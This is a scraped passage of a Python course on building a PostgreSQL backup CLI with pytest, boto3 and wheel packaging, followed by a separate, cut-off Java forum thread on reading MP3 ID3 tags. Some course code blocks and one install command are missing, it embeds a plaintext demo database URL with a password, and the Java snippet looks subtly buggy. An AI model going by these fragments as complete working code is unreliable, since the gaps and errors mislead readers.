subprocess.Popen. Returns the subprocess that STDOUT can be read from. We know how to use the subprocess module, but we haven’t used subprocess.Popen yet. Behind the scenes, the functions that we already know use Popen, and wait for it to finish. We’re going to use this instead of run, because we want to continue running code instead of waiting, right until we need to write the contents of proc.stdout to a file or S3. To ensure that our code runs the proper third-party utilities, we’re going to use mocker.patch on the subprocess.Popen constructor. This will substitute in a different implementation that holds onto information like the number of times the function is called and with what arguments. Let’s see what this looks like in practice:) The arguments that we’re passing to assert_called_with will need to match what is being passed to subprocess.Popen when we exercise pgdump.dump(url). Implementing PostgreSQL Interaction 00:11:26 Lesson Description: We now have tests for our pgdump implementation, and we have a basic understanding of mocking. Let’s start following the errors to completion. Documentation For This Video The pytest-mock package The subprocess package The subprocess.Popen class The mocker.patch function The pytest.raises function The sys.exit function Initial Implementation? Adding Tests For Missing PostgreSQL Client:) def test_dump_handles_oserror(mocker): """ pgdump.dump returns a reasonable error if pg_dump isn't installed. """ mocker.patch('subprocess.Popen', side_effect=OSError("no such file")) with pytest.raises(SystemExit): pgdump.dump(url) Implementing Error Handling) Manual Testing. Implementing Local File Storage 00:08:54 Lesson Description: The last few pieces of logic that we need to implement pertain to how we store the database dump. We’ll have a strategy for storing locally and on AWS S3, and it makes sense to put both of these in the same module. Let’s use TDD to implement the local storage strategy of our storage module. Documentation For This Video The tempfile package The tempfile.TemporaryFile class The tempfile.NamedTemporaryFile class Writing Local File Tests Working with files is something that we already already know how to do, and local storage is no different. If we think about what our local storage driver needs to do, it really needs two things: Take in one “readable” object and one, local, “writeable” object. Write the contents of the “readable” object to the “writeable” object. Notice that we didn’t say files, that’s because we don’t need our inputs to be file objects. They need to implement some of the same methods that a file does, like read and write, but they don’t have to be file objects. For our testing purposes, we can use the tempfile package to create a TemporaryFile to act as our “readable” and another NamedTemporaryFile to act as our “writeable”. We’ll pass them both into our function, and assert after the fact that the contents of the “writeable” object match what was in the “readable” object: tests/test_storage.py import tempfile from pgbackup import storage def test_storing_file_locally(): """ Writes content from one file-like to another """ infile = tempfile.TemporaryFile('r+b') infile.write(b"Testing") infile.seek(0) outfile = tempfile.NamedTemporaryFile(delete=False) storage.local(infile, outfile) with open(outfile.name, 'rb') as f: assert f.read() == b"Testing" Implement Local Storage The requirements we looked at before are close to what we need to do in the code. We want to call close on the “writeable” file to ensure that all of the content gets written (the database backup could be quite large): src/pgbackup/storage.py def local(infile, outfile): outfile.write(infile.read()) outfile.close() infile.close() Implementing AWS Interaction 00:14:08 Lesson Description: The last unit that we need to implement before we can combine all of our modules into our final tool is the storage strategy for AWS S3. Documentation For This Video The boto3 package The pytest-mock package The Mock class Installing boto3 To interface with AWS (S3 specifically), we’re going to use the wonderful boto3 package. We can install this to our virtualenv using pipenv: (pgbackup-E7nj_BsO) $ pipenv install boto3 Configuring AWS Client Writing S3 test Following the approach that we’ve been using, let’s write tests for our S3 interaction. To limit the explicit dependencies that we have, we’re going to have the following parameters to our storage.s3 function: A client object that has an upload_fileobj method. A boto3 client meets this requirement, but in testing, we can pass in a “mock” object that implements this method. A file-like object (responds to read). An S3 bucket name as a string. The name of the file to create in S3.") Implementing S3 Strategy) Manually Testing S3 Integration' Integrating Features and Distributing the Project Wiring the Units Together 00:19:00 Lesson Description: We’ve successfully written the following: CLI parsing Postgres Interaction Local storage driver AWS S3 storage driver Now we need to wire up an executable that can integrate these parts. Up to this point we’ve used TDD to write our code. These have been “unit tests” because we’re only ever testing a single unit of code. If we wanted to write tests that ensure our application worked from start to finish, we could do that and they would be “integration” tests. Given that our code does a lot with the network, and we would have to do a lot of mocking to write integration tests, we’re not going to write them. Sometimes the tests aren’t worth the work that goes into them. Documentation For This Video The boto3 package The setuptools script creation The time.strftime function Add “console_script” to project We can make our project create a console script for us when a user runs pip install. This is similar to the way that we made executables before, except we don’t need to manually do the work. To do this, we need to add an entry point in our setup.py: setup.py (partial) install_requires=['boto3'], entry_points={ 'console_scripts': [ 'pgbackup=pgbackup.cli:main', ], } Notices that we’re referencing our cli module with a : and a main. That main is the function that we need to create now. Wiring The Units Together Our main function is going to go in the cli module, and it needs to do the following: Import the boto3 package. Import our pgdump and storage modules. Create a parser and parse the arguments. Fetch the database dump. Depending on the driver type do one of the following: create a boto3 S3 client and use storage.s3 or open a local file and use storage.local src/pgbackup/cli.py def main(): import boto3 from pgbackup import pgdump, storage args = create_parser().parse_args() dump = pgdump.dump(args.url) if args.driver == 's3': client = boto3.client('s3') # TODO: create a better name based on the database name and the date storage.s3(client, dump.stdout, args.destination, 'example.sql') else: outfile = open(args.destination, 'wb') storage.local(dump.stdout, outfile) Let’s test it out: $ pipenv shell (pgbackup-E7nj_BsO) $ pip install -e . (pgbackup-E7nj_BsO) $ pgbackup --driver local ./local-dump.sql postgres://demo:password@54.245.63.9:80/sample (pgbackup-E7nj_BsO) $ pgbackup --driver s3 pyscripting-db-backups postgres://demo:password@54.245.63.9:80/sample Reviewing the Experience It worked! That doesn’t mean there aren’t things to improve though. Here are some things we should fix: Generate a good file name for S3 Create some output while the writing is happening Create a shorthand switch for --driver (-d) Generating a Dump File Name For generating our filename, let’s put all database URL interactions in the pgdump module with a function name of dump_file_name. This is a pure function that takes an input and produces an output, so it’s a prime function for us to unit test. Let’s write our tests now: tests/test_pgdump.py (partial) def test_dump_file_name_without_timestamp(): """ pgdump.db_file_name returns the name of the database """ assert pgdump.dump_file_name(url) == "db_one.sql" def test_dump_file_name_with_timestamp(): """ pgdump.dump_file_name returns the name of the database """ timestamp = "2017-12-03T13:14:10" assert pgdump.dump_file_name(url, timestamp) == "db_one-2017-12-03T13:14:10.sql" We want the file name returned to be based on the database name, and it should also accept an optional timestamp. Let’s work on the implementation now: src/pgbackup/pgdump.py (partial) def dump_file_name(url, timestamp=None): db_name = url.split("/")[-1] db_name = db_name.split("?")[0] if timestamp: return f"{db_name}-{timestamp}.sql" else: return f"{db_name}.sql" Improving the CLI and Main Function We want to add a shorthand -d flag to the driver argument, let’s add that to the create_parser function: src/pgbackup/cli.py (partial) def create_parser(): parser = argparse.ArgumentParser(description=""" Back up PostgreSQL databases locally or to AWS S3. """) parser.add_argument("url", help="URL of database to backup") parser.add_argument("--driver", "-d", help="how & where to store backup", nargs=2, metavar=("DRIVER", "DESTINATION"), action=DriverAction, required=True) return parser Lastly, let’s print a timestamp with time.strftime, generate a database file name, and print what we’re doing as we upload/write files. src/pgbackup/cli.py (partial) def main(): import time import boto3 from pgbackup import pgdump, storage args = create_parser().parse_args() dump = pgdump.dump(args.url) if args.driver == 's3': client = boto3.client('s3') timestamp = time.strftime("%Y-%m-%dT%H:%M", time.localtime()) file_name = pgdump.dump_file_name(args.url, timestamp) print(f"Backing database up to {args.destination} in S3 as {file_name}") storage.s3(client, dump.stdout, args.destination, file_name) else: outfile = open(args.destination, 'wb') print(f"Backing database up locally to {outfile.name}") storage.local(dump.stdout, outfile) Feel free to test the CLI’s modifications and commit these changes. Building and Sharing a Wheel Distribution 00:06:52 Lesson Description: For our internal tools, there’s a good chance that we won’t be open sourcing every little tool that we write, but we will want it to be distributable. The newest and preferred way to distribute a python tool is to build a ‘wheel’. Let’s set up our tool now to be buildable as a wheel so that we can distribute it. Documentation For This Video The wheel documentation Adding a setup.cfg Before we can generate our wheel, we’re going to want to configure setuptools to not build the wheel for Python 2. We can’t build for Python 2 because we used string interpolation. We’ll put this configuration in a setup.cfg: setup.cfg [bdist_wheel] python-tag = py36 Now we can run the following command to build our wheel: (pgbackup-E7nj_BsO) $ python setup.py bdist_wheel Next, let’s uninstall and re-install our package using the wheel file: (pgbackup-E7nj_BsO) $ pip uninstall pgbackup (pgbackup-E7nj_BsO) $ pip install dist/pgbackup-0.1.0-py36-none-any.whl Install a Wheel From Remote Source (S3) We can use pip to install wheels from a local path, but it can also install from a remote source over HTTP. Let’s upload our wheel to S3 and then install the tool outside of our virtualenv from S3: (pgbackup-E7nj_BsO) $ python >>> import boto3 >>> f = open('dist/pgbackup-0.1.0-py36-none-any.whl', 'rb') >>> client = boto3.client('s3') >>> client.upload_fileobj(f, 'pyscripting-db-backups', 'pgbackup-0.1.0-py36-none-any.whl') >>> exit() We’ll need to go into the S3 console and make this file public so that we can download it to install. Let’s exit our virtualenv and install pgbackup as a user package: (pgbackup-E7nj_BsO) $ exit $ pip3.6 install --user $ pgbackup --help Exercise: Creating a Python Project 00:30:00 Exercise: Test Drive Building a CLI Parser 00:30:00 Exercise: Implementing User Management 02:00:00 Exercise: JSON Parsing and Exporting 01:30:00 Exercise: Creating the Console Script 00:30:00 Exercise: Building a Wheel Distribution 00:30:00 Python Projects, Testing, and Distribution Course Conclusion Final Steps What's Next? 00:01:12 Lesson Description: Thank you for taking the time to go through this course! I hope that you learned a lot and I want to hear about it. If you could please take a moment to rate the course, it will help me know what is working and what is not. Now that you have a grasp of Python scripting, there are a lot of doors open to you to continue your learning. Dive into more configuration management using Ansible (which is written in Python), learn about data science, write more custom scripts, or maybe dive into web development.
https://linuxacademy.com/course/python-3-for-system-administrators/
CC-MAIN-2019-39
refinedweb
19,752
63.8
Summer of Code/Rishabh Thaney Sugar on Raspberry Pi About Me What is your name? My name is Rishabh Thaney and I am a 2nd year undergraduate student at Bharati Vidyapeeth's College of Engineering, New Delhi, India. What is your email address? My email address is rishabhthaney@gmail.com What is your Sugar Labs wiki username? My Sugar Labs wiki username is Rishabh42 What is your IRC nickname on irc.freenode.net? My IRC nickname is Rishabh42 What is your first language? (We have mentors who speak multiple languages and can match you with one of them if you'd prefer.) My first language of communication is English and I am also fluent in Hindi. Where are you located, and what hours (UTC) do you tend to work? (We also try to match mentors by general time zone if possible.) I am located in New Delhi, India and my time zone is Indian Standard Time (UTC + 5:30). I am planning to work from 6:00 to 14:00 (UTC) but my timings are flexible. I'm very excited to work on this project during the summer and I can surely manage my time and be active when to the world of open-source. The whole idea of working with developers all across the world and developing software that millions of people can use and contribute to has always fascinated me. I've been using Sugar since the past couple of months and I'm truly mesmerized by the work being done over here. Sugar labs gave me a deeper understanding about the technological advances in education and I believe that contributing to an open-source project under Sugar Labs would consequently improve the quality of education and as a result more people will be educated. As far as my involvement with an open-source project is concerned, I have reported a critical bug that I found in the browse activity, the whole bug report can be found here: I also have 2 open-source repositories on Github which have the MIT opensource license. These are listed as follows: - Defend My Castle game for Sugar: Earlier I was working on developing an activity using PyGame for Sugar, and the link to my project is: - Solutions of the programming assignments of the Andrew Ng machine learning course: This repository contains my solutions to the programming assignments of the course which I successfully completed: About your project We are looking for projects that will enhance the Sugar Learning Platform. Please consider how your project will have impact on children learning. What is the name of your project? The name of my project is Sugar on Raspberry Pi. Describe your project in 10-20 sentences. What are you making? Who are you making it for, and why do they need it? What technologies (programming languages, etc.) will you be using? Project Description: The Raspberry Pi is a system on chip (SoC) computer that can be used for a variety of projects and has been heralded as a great boon to education due to its low cost, flexibility and simplicity. The Raspberry Pi provides a very robust platform for educational institutions to incorporate new technologies in education especially when teaching children how to program and it is because of this functionality of the Pi that it has seen widespread adoption in schools. It would be a marvelous idea if we could get Sugar to run on the Raspberry Pi as it would provide students and teachers with an intuitive and interactive learning environment. Aim of the project: The aim of the project is to make Sugar run perfectly on the Raspberry Pi like it does on the XO laptops and to create an image of Sugar which is suitable for inclusion on the Raspberry Pi download page. I've installed Sugar on my Raspberry Pi 3 and it seems to work pretty well except some features which are in need of essential development. Project Goals and Tasks: The goals and tasks of the project have been listed as follows: Goals: - Make a Raspbian image of the Sugar desktop environment which can be flashed on the SD card of the Raspberry Pi. An “image” in this case is an array of data blocks for a micro SD card which will contain a partition table, a boot and root filesystem specifically designed for the Raspberry Pi. - Document the whole process and publish a script showing how others can make the image themselves. - Ensure all the activities work well or are removed from the image. - List the Raspbian Sugar desktop image on Raspberry Pi Foundation's downloads page. Tasks: - Write scripts to build a Raspbian Sugar desktop image, and document how to do it - Upload the scripts to github and call for others to reproduce the script and record results - Publish the build to the mailing list and the Wiki page so that other members of the community can test, and record results - Figure out a way to list the image on Raspberry Pi foundation's download page. - Talk to Debian developers (Jonas, Sebastian) to ensure that my work is included in their task. - Fix the following list of activities: - Browse(Debian bug #848840) Browse activity fails to start and shell.log displayed the following errors: Traceback (most recent call last): File "/usr/bin/sugar-activity", line 220, in <module> main() File "/usr/bin/sugar-activity", line 164, in main module = __import__(module_name) File "/usr/share/sugar/activities/Browse.activity/webactivity.py", line 52, in <module> from collabwrapper.collabwrapper import CollabWrapper ImportError: No module named collabwrapper.collabwrapper Possible solution: Adding an empty __init__.py file in /usr/share/sugar/activities/Browse.activity/collabwrapper/ seemed to have solved the problem and browse is working fine. The main repository of the browse activity and the xo file does have this fix so there's a good chance that the problem began after the Debian packaging of Sucrose, therefore a newer release of the activity(Browse-201) is suggested because then it will trigger the Debian team to package the activity again and remove the bug as a side effect. The following diagram shows the benefits of releasing a new version of browse: Diagram credits: James Cameron From the above diagram, it is quite evident that if a new release of browse is made then there would be a cascade of positive effects but just patching the __init__.py fix when building the image won't cause that cascade to happen. The following screen shot shows the browse activity running on the raspberry pi after I fixed the __int__.py file: - Physics Physics.py doesn't run inside the Pippy activity and gives the following errors: Traceback (most recent call last): File "/home/pi/.sugar/default/org.laptop.Pippy/tmp/physics.py", line 17, in <module> world = physics.Elements(screen.get_size()) File "/usr/lib/python2.7/dist-packages/elements/elements.py", line 107, in __init__ self.world = box2d.b2World(self.worldAABB, self.gravity, self.doSleep) TypeError: __init__() takes at most 3 arguments (4 given) Expected result: Fix the code of physics.py so that it can start inside the Pippy activity. - Write(Debian bug #842443) Every time the write activity starts it makes the screen flicker and the text in the document opened inside the write activity is therefore unreadable. The bug might be caused because of an interaction between libabiword and libgtk. My approach: To bisect the problem by gtk feature development; start with known good gtk and abiword versions, then look at gtk release notes to find what changed in the API, and consider the same changes in the abiword source code. - Jukebox Jukebox fails to start and shell.log reported the following errors: Traceback (most recent call last): File "/usr/bin/sugar-activity", line 220, in <module> main() File "/usr/bin/sugar-activity", line 164, in main module = __import__(module_name) File "/usr/share/sugar/activities/Jukebox.activity/activity.py", line 51, in <module> from player import GstPlayer File "/usr/bin/player.py", line 14, in <module> from PIL import Image, ImageTk ImportError: cannot import name ImageTk Possible causes: According to what I have understood, the activity fails inside a package called pillow on an import, even though the activity clearly does not import pillow. In addition to that, pillow installs /usr/bin/player which is a python script and the activity has a player.py file in the bundle. The import player should use bundle source, but it instead uses a /usr/bin file which could be caused because the activity was using an incorrect python path. Expected result: sugar-toolkit-gtk3 in git already has the fix, so my work will be to ensure that the fix reaches the image and jukebox can start. Stretch goals: - Add turtleblocks or measure activity in Sucrose. - Make a demo video about the activities being used on the Raspberry pi.ling projects which are not mostly working by then. Following is the timeline that I plan to follow: Days Task 4th May to 29th May - Community Bonding Period - Get thorough with the code base of Sucrose(Though I already have some experience) - Gain insight on the code bases of Browse, physics.py, Write, jukebox activities - Interact with the mentors and other community members and devise a suitable plan to fix the activities. 30th May to 5th June - (Exam week in college) - Talk to Debian developers (Jonas, Sebastian) to ensure that my work is included in their task. - Discuss the different tools and techniques used to make raspbian images and also find an efficient way to build Sucrose. 6th June to 12th June - Start working on the browse activity. - Fix the bugs in it's code base and prepare a new release(browse-201) 13th June to 14th June - Send in patches for review by the mentors. - Make sure that the activity is working fine 15th June to 22nd June - Start writing scripts to build a Raspbian Sugar desktop image for RPi, and document how to do it. 22nd June to 23rd June - Upload the scripts to github and call for others to reproduce the script and record results - Publish the build to the mailing list and the Wiki page so that other members of the community can test, and record results 24th June to 26th June - Prepare for phase 1 evaluations, re-evaluate the submitted patches and update the documentation. - Browse activity should be working and the first build image of Sugar should be completed by phase 1 evaluation 26th June to 30th June - Phase 1 evaluation 1st July to 8th July - Review the changes to be made in the image build based on the feedback from the community. - Start working on physics.py - Make sure that the code of physics is running inside pippy. 9th July to 10th July - Send patches for review by the community 11th July to 18th July - Start working on the jukebox activity - Ensure that the sugar-toolkit-gtk3 fix reaches the image and jukebox can start. 19th July to 20th July - Send patches for review by the community 21st July to 23rd July - Prepare for phase 2 evaluations, re-evaluate the submitted patches and update the documentation. - Include jukebox activity and physics.py in the build image of Sucrose 24th July to 28th July - Phase 2 evaluation - Buffer period 29th July to 5th August - Start working on the write activity - Test to confirm that the write activity is fixed 6th August to 7th August - Send patches for review by the community. 8th August to 12th August - Include write activity in the build image of Sucrose. 13th August to 16th August - Reach out to the Raspberry Pi Foundation and figure out a way with them to list the image on their page 17th August to 20th August - Update the documentation and the wiki page. - Test the build image to ensure that everything is working perfectly. - Add comments that will help further development - Work on completing the stretch goals 21st August to 29th August - Final week familiar with the code base of Sugar since I've been using it and have also been interacting with the community since the past month. I have discussed some of the Sugar activity problems and image build methods on IRC with other people in the Sugar community who helped me develop a clear understanding of the goals and tasks of the project and now I know exactly what needs to be developed and how. During my college summer break this year, I have no other commitments apart from GSOC so there won't be any obstacles regarding my availability and the goals I aim to accomplish within the stipulated time. Moreover, I have already started working on this project and have also found a fix for the browse activity, in addition to that I had also reported a critical bug in the browse activity which was preventing it from installing the activities downloaded from the Sugar activity store. The link to that report is: - I was also working on developing an activity for Sugar earlier and have clearly understood how the activities work on the platform. This is an ongoing project and the link for the same is here: Past experience & credentials : - Slide game: A simple slide game made using python, link of the project is: - Defend my Castle: A tower defense game made using the PyGame library in python. Link of the project is: - Tic Tac Toe game for android: Made a simple Tic Tac Toe game for Android during my freshman year in college, the link of the project is:- - Web crawler: A python script which can extract data from the desired web page, it was made using the beautifulsoup library in python. Link of the project is: - Machine Learning course(Andrew Ng): Successfully completed the Andrew Ng machine learning course on coursera. My answers to the programming assignments of the course can be found here:: The purpose of the project “Sugar on Raspberry Pi” is to provide a more economical option as compared to the XO laptop and OLPC's NL3, since a single Raspberry Pi unit costs around $40 as opposed to the price of a single XO laptop which costs around $200. It is quite evident that the price difference between the two is quite large and switching to the Raspberry Pi will significantly reduce the costs of the organization using it, even if you include the cost of keyboards, mice and displays that will be attached to the Pi. It will also provide a more efficient way of using Sugar on displays like a monitor as it has a small form factor compared to a CPU which, as a result, will save more desk space. Walter Bender's answer: Raspberry PI is a rapidly growing community and especially popular within the "maker movement". A solid and easy-to-install version of Sugar would be a nice fit as we share many of the same pedagogical values. This project presents a great opportunity to expand our community of users and contributors. In addition to the responses I got from the members of the Sugar Labs community, I have also received a response from Mr. James Cameron which is as follows: Work on this project has the potential to benefit owners of Raspberry Pi hardware, users of Debian, and users of Ubuntu. Of slightly lower benefit will be upstreamed fixes that are applicable to users of Fedora, SoaS, and Trisquel. For the Sugar Labs community the project will provide critical interactions and a sense of common purpose. For OLPC, fixes to activities will benefit our product offering, and the availability of a ready-made image for Raspberry Pi will increase awareness of the Sugar Learning Environment in the wider education community. Disclosure: James Cameron works for OLPC Inc, which uses Sugar in their products. Email ID: quozl@laptop.org What will you do if you get stuck on your project and your mentor isn't around? In such situation , I will first try to solve the problem by searching on web for suitable solutions. If this doesn't work, then I will contact other developers on the IRC channel and also post on the mailing list. From my past experience, I have noticed that the members of community are quite responsive and I'm sure that they will be able to help me out. I'm also in contact with a couple of people who work on open-source projects and some who are also Raspberry Pi enthusiasts like me, so I can reach out to them and I'm pretty sure that they will help me out. How do you propose you will be keeping the community informed of your progress and any problems or questions you might have over the course of the project? I am planning on maintaining a blog regarding the project where I will post updates of the progress, obstacles being faced and their solutions. As far as daily progress is concerned, I will keep my mentors informed of my progress by sending them links and any other useful updates over mail or on IRC if they are online. I will also keep the community informed by giving them updates over IRC and the mailing list about the milestones I achieve. This project also requires me to engage with other open-source communities like Debian project and the Raspbian project which I also plan to do over IRC and mail. Miscellaneous We want to make sure that you can set up a development environment before the summer starts. Please do one of the following: Send us a link to a screen shot of your Sugar development environment with the following modification: when you hover over the XO-person icon in the middle of Home view, the drop-down text should have your email in place of "logout". Describe a great learning experience you had as a child. When I was in school, I used to actively participate in technology and science related competitions. Once, my teacher told me about an inter school game making competition 3 days before the final date of submission and even though it was quite late to start coding the game from scratch and finishing it, I still didn't give up and tried my best to make the game and successfully submitted it. Even though I didn't win that competition but the whole journey of making that game helped me unearth my passion for coding and taught me how to stay calm and focused under stressful situations.
http://wiki.sugarlabs.org/go/Summer_of_Code/Rishabh_Thaney
CC-MAIN-2020-45
refinedweb
3,093
56.18
C++/Variables and User Input Contents Variables[edit] Variables are used by the computer, as specified by you in your program, to record the current state of play at each step of the execution of your program so that your computer can suspend execution of your program at any point, step away, attend to some other matter, return and then continue its execution of your program without losing any information in the process. The amount of work that a computer does in each step depends on the architecture of the computer, that is to say, how the computer has been designed. Where are they held?[edit] Variables are located in the minds of programmers and in the memory of computers. Programmers uses symbolic names to describe variables in their minds, for instance: 'the depth of the snow on the mountain' or "the amount of money in the customer's bank account". Ultimately, for reasons of efficiency, locations in computer memory are referred to by numbers often represented in awkward hexadecimal notation, for example: 0xcafebabe. The compiler assists programmers by managing the relationship between the symbolic and numeric representations of the locations of variables to reduce the number of errors that programmers would surely make if there were required to refer to every variable they have in mind purely by its current location in the memories of their computers. C++ requires the programmer to use names constructed solely from letters chosen from a through z, A through Z, and numbers chosen from 0 through 9. C++ considers upper case letters to be different from lower case lowercase letters. Names must start with a letter. Thus C++ allows : a to be used as a variable name. Further examples of variable names that are permitted by C++ include: A, a1, alpha, abc22, snowDepth, amountInCustomerAccount etc. "Customer's account balance" is not a valid variable name in C++ because it contains spaces which are not allowed and because it contains an apostrophe which is also not permitted by C++ in variable names. However, while the definition of the C++ language allows other letters to be used in variable names such as: 𝝰 most C++ compilers and editors fail to support such letters reflecting a bias that unfortunately you will be required to perpetuate if you wish to publish the source code of your program. How big are they?[edit] Whilst in the imagination of programmers variables can be as big or as small as required, in reality, C++ programs are expected to execute on physical computers that only have a finite amount of memory. Worse, each bit of memory in a finite computer is also of finite size. Thus the smallest amount of memory that can be described by a C++ variable is one bit and the maximum is the size of the memory implemented by the architecture of the specific computer the program is executing on. How many are there?[edit] Again, in the mind of the programmer, the number of variables is unlimited, but on a real computer with a specific architecture there will be an upper limit which the computer industry has struggled to raise for decades with very little effect. As noted above, computer use numbers to name variables, the smallest amount of memory that can be used on a physical computer is one bit and compilers are programs that describe variables by connecting names to numbers, thus if you have a 32 bit architecture computer the maximum number of variables that you can hope to address in a C++ program is the number of possible numbers that can be described with 32 bits. Of course in reality due to poor coding technique, most compilers do not achieve this theoretical upper limit. Declaring variables[edit] Declaring variables is easy just <variable_type> <variable_name>. Let's say you want to declare an integer. int myInt; Assigning values[edit] What are variables without values? In order to use a variable you just need to declare it and give it a value. myInt = 0; Can't I just declare myInt and assign it a value in one go? The answer is Yes! we can as in the following way : int myInt = 0; Types of Variables[edit] Boolean (bool)[edit] The bool type is a 1 byte data type that is either true or false. A true being any number other than zero and false being zero. The true keyword uses the value 1 to assign true. bool canJump = false; Integers[edit] An integer is a number that does not have any decimal places. It is a whole number, for example 1,2,3,4 are all integers. 4.3 is not. If you were to try and place the number 4.3 into an integer the number will be truncated to 4. // Short is normally defined as a 16-bit integer. short myVariableName1; // stores from -32768 to +32767 short int myVariableName2; // stores from -32768 to +32767 signed short myVariableName3; // stores from -32768 to +32767 signed short int myVariableName4; // stores from -32768 to +32767 unsigned short myVariableName5; // stores from 0 to +65535 unsigned short int myVariableName6; // stores from 0 to +65535 // Int is guaranteed to be 16-bit, but modern implementations use 32-bit for an int. int myVariableName7; // stores from -32768 to +32767 signed int myVariableName8; // stores from -32768 to +32767 unsigned int myVariableName9; // stores from 0 to +65535 // Long is a 32-bit number. long myVariableName10; // stores from -2147483648 to +2147483647 long int myVariableName11; // stores from -2147483648 to +2147483647 signed long myVariableName12; // stores from -2147483648 to +2147483647 signed long int myVariableName13; // stores from -2147483648 to +2147483647 unsigned long myVariableName14; // stores from 0 to +4294967295 unsigned long int myVariableName15; // stores from 0 to +4294967295 Now we can attribute reasons to the ranges of int , long and so on. for int : 2^16 = 65536. now this is the total range of a variable . Dividing by 2 we get , 32768. So -32768 to 32767 ( it should have been 32768 but 1 place is taken by 0 ). Now the size of long is 4 bytes ( 32 bits) . So range is 2^32. What is the difference between a "long" and a "signed long int"? In my mind, the only difference is 12 extra keystrokes. Pick one that works for you. Char[edit] A char is an 8 bit integer. This means that an unsigned char can store between 0 and 255, and a signed char can store between -128 and 127. Unsigned chars are commonly used to store text in ASCII format, and can be used to store strings of information. A char can be initialized to hold either a number or a character, but it will store only the ASCII value. char myChar='A'; char myOtherChar=65; Both characters that I have just initialized would be equal. The number 65 is the ASCII code for the letter 'A', so both characters would contain the 8-bit value of 65, or the letter 'A'. ASCII is a system where numerical value is assigned to every character you can think of. For a complete conversion chart visit Floats[edit] Floats are floating point numbers, which means that these numbers can hold decimal places. This allows us to store numbers such as "8.344" and "3432432653.24123". float myFloat; // Creates a floating point variable myFloat = 8.3; // Stores 8.3 in the new variable Floating point numbers have a fixed size in memory. This means that a single float cannot possibly precisely store all of the decimal values in the real number system. While in many cases it will not matter, it is important to note the float data type usually stores only a good approximation of a decimal value, not an exact value. Doubles[edit] Doubles are like "floats", which means they can store decimal places. Doubles can generally store more information than a standard float. double myDouble; // Created myDouble myDouble = 8.78; // Stores 8.78 in myDouble As noted with the float data type, double usually stores only an approximation of exact decimal values (albeit, usually a higher precision approximation than the smaller float data type). Lesson 2 Program[edit] Getting User Input[edit] Let's start simple. We'll read in a char and put it back out. #include <iostream> int main() { char myChar; std::cout << "Enter a character. ENTER: "; std::cin >> myChar; std::cout << "You entered: " << myChar << std::endl; std::cin.clear(); //ignore any superfluous input std::cin.sync(); //synchronize with the console std::cin.get(); //wait for the user to exit the program return 0; } you could also go with a namespace, as shown here: #include <iostream> using namespace std; int main() { char myChar; cout << "Enter a character. ENTER: "; cin >> myChar; cout << "You entered: " << myChar << endl; cin.clear(); cin.sync(); cin.get(); return 0; } What if we want to read in an integer and put it back out. #include <iostream> using namespace std; int main() { int myInt; cout << "Enter an integer and press ENTER: "; cin >> myInt; cout << "You entered: " << myInt << endl; return 0; }
https://en.wikiversity.org/wiki/C%2B%2B/Variables_and_User_Input
CC-MAIN-2020-10
refinedweb
1,499
61.36
NAMEio_setup - create an asynchronous I/O context SYNOPSIS #include <linux/aio_abi.h> /* Defines needed types */ long io_setup(unsigned int nr_events, aio_context_t *ctx_idp); Note: There is no glibc wrapper for this system call; see NOTES. DESCRIPTIONNote: this page describes the raw Linux system call interface. The wrapper function provided by libaio uses a different type for the ctx_idp argument. See NOTES.On success, io_setup() returns 0. For the failure return, see NOTES. ERRORS - EAGAIN - The specified nr_events exceeds the limit of available events, as defined in /proc/sys/fs/aio-max-nr (see proc(5)). -. VERSIONSThe asynchronous I/O system calls first appeared in Linux 2.5. CONFORMING TOio_setup() is Linux-specific and should not be used in programs that are intended to be portable. NOTESGlibc does not provide a wrapper.
https://man.archlinux.org/man/io_setup.2.en
CC-MAIN-2022-21
refinedweb
130
59.7
Question 11 :, which the application parses to determine what XML namespace the local name belongs to. For example, suppose you have associated the serv prefix with the namespace and that the declaration is still in scope. In the following, serv:Address refers to the Address name in the namespace. (Note that the prefix is used on both the start and end tags.) <!-- serv refers to the namespace. --> <serv:Address>127.66.67.8</serv:Address> Now suppose you have associated the xslt prefix with the namespace. In the following, xslt:version refers to the version name in the namespace: <!-- xslt refers to the namespace. --> <html xslt: Question 12 : ), which the application parses to determine what XML namespace it belongs to. For example, suppose you declared the namespace as the default XML namespace and that the declaration is still in scope. In the following, Address refers to the Address name in the namespace. <!-- is the default XML namespace. --> <Address>123.45.67.8</Address> Question 13 : What is XML?). Question 14 : What is a markup language? A markup language is a set of words and symbols for describing the identity of pieces of a document (for example 'this is a paragraph', 'this is a heading', 'this is a list', 'this is the caption of this figure', etc). Programs can use this with a style sheet to create output for screen, print, audio, video, Braille, etc. Some markup languages (e.g. those used in word processors) only describe appearances ('this is italics', 'this is bold'), but this method can only be used for display, and is not normally re-usable for anything else. Question 15 : (e.g. Braille, Audio, etc) from a single source document by using the appropriate style sheets..
http://www.indiaparinam.com/xml-question-answer-xml-interview-questions/set-2/page2
CC-MAIN-2019-13
refinedweb
289
74.59
While most naming conflicts in C++ can be solved using namespaces), this is not true for preprocessor macros. This post is outdated. You will find an updated version here: How and Why to Avoid Preprocessor Macros Macros can not be put into namespaces. If you would try to declare a new class called Stream, but somewhere in a header you include would be a macro called Stream, things would break. While compiling your code, the preprocessor would simply replace the Stream in your class Stream { declaration. You could get a really confusing error message, and it would take time and energy to find the actual problem. Especially people developing software for controllers, often overuse macros for almost everything. They believe it will save RAM, speed up the code or make it more flexible. Often none of these three things are true. Actually each additional macro is a risk for name conflicts and makes the code less readable. You should reduce the use of macros to the absolute minimum, and especially avoid macros in your header files. Continue reading How and Why to Avoid Preprocessor Macros
https://luckyresistor.me/tag/preprocessor/
CC-MAIN-2019-30
refinedweb
185
72.76
Hi Printable View Hi Hello John and welcome to the Java programming forums :D What do you mean by parse? Are you looking to print an mp3s ID3 tag information to the console? Yeah thats basically what i need to do. I need to print the ID3 tag info in which i'll probably use a GUI to display the info, but i'm a bit of a novice with java and was just curious if anyone knew of any good resources on how to do this. Thanks John I haven't tested this code myself but try this: You need to place the .mp3 files in the application directory to get this program to work correctly.You need to place the .mp3 files in the application directory to get this program to work correctly.Code : import java.io.*; public class ReadID3 { public static void main(String[] arguments) { try { File song = new File("."); File [] list = song.listFiles(); for(int i=0;i<list.length;i++) { FileInputStream file = new FileInputStream(list[i]); int size = (int)list[i].length(); file.skip(size - 128); byte[] last128 = new byte[128]; file.read(last128); String id3 = new String(last128); String tag = id3.substring(0, 3); if (tag.equals("TAG")) { System.out.println("Title: " + id3.substring(3, 32)); System.out.println("Artist: " + id3.substring(33, 62)); System.out.println("Album: " + id3.substring(63, 91)); System.out.println("Year: " + id3.substring(93, 97)); } else System.out.println(" does not contain" + " ID3 info."); file.close(); } } catch (Exception e) { 